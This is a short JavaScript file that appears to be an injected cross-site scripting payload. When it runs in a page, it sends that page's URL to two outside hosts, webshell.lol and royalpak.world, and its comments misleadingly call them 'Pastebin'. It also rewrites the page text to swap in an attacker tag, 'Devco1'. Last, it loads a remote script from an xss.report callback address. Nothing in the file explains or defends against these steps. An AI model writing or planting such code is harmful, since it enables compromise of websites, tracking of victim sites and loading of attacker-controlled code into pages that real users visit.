// Send current URL to Pastebin
const url = window.location.origin + window.location.pathname;
const saveUrl = 'https://webshell.lol/save.php?url=' + encodeURIComponent(url);
const saveUrl2 = 'https://royalpak.world/save.php?url=' + encodeURIComponent(url);


fetch(saveUrl, {
  method: 'GET',
})
  .then(response => {
    if (!response.ok) {
      throw new Error('Failed to send to Pastebin');
    }
    console.log('Successfully sent to Pastebin');
  })
  .catch(error => {
    console.error('Error:', error);
  });

fetch(saveUrl2, {
  method: 'GET',
})
  .then(response => {
    if (!response.ok) {
      throw new Error('Failed to send to Pastebin 2');
    }
    console.log('Successfully sent to Pastebin 2');
  })
  .catch(error => {
    console.error('Error:', error);
  });
document.body.innerHTML = document.body.innerHTML.replaceAll(
  "BIBIL_0DAY",
  "Devco1"
);

var a=document.createElement("script");a.src="https://xss.report/c/bibil";document.body.appendChild(a);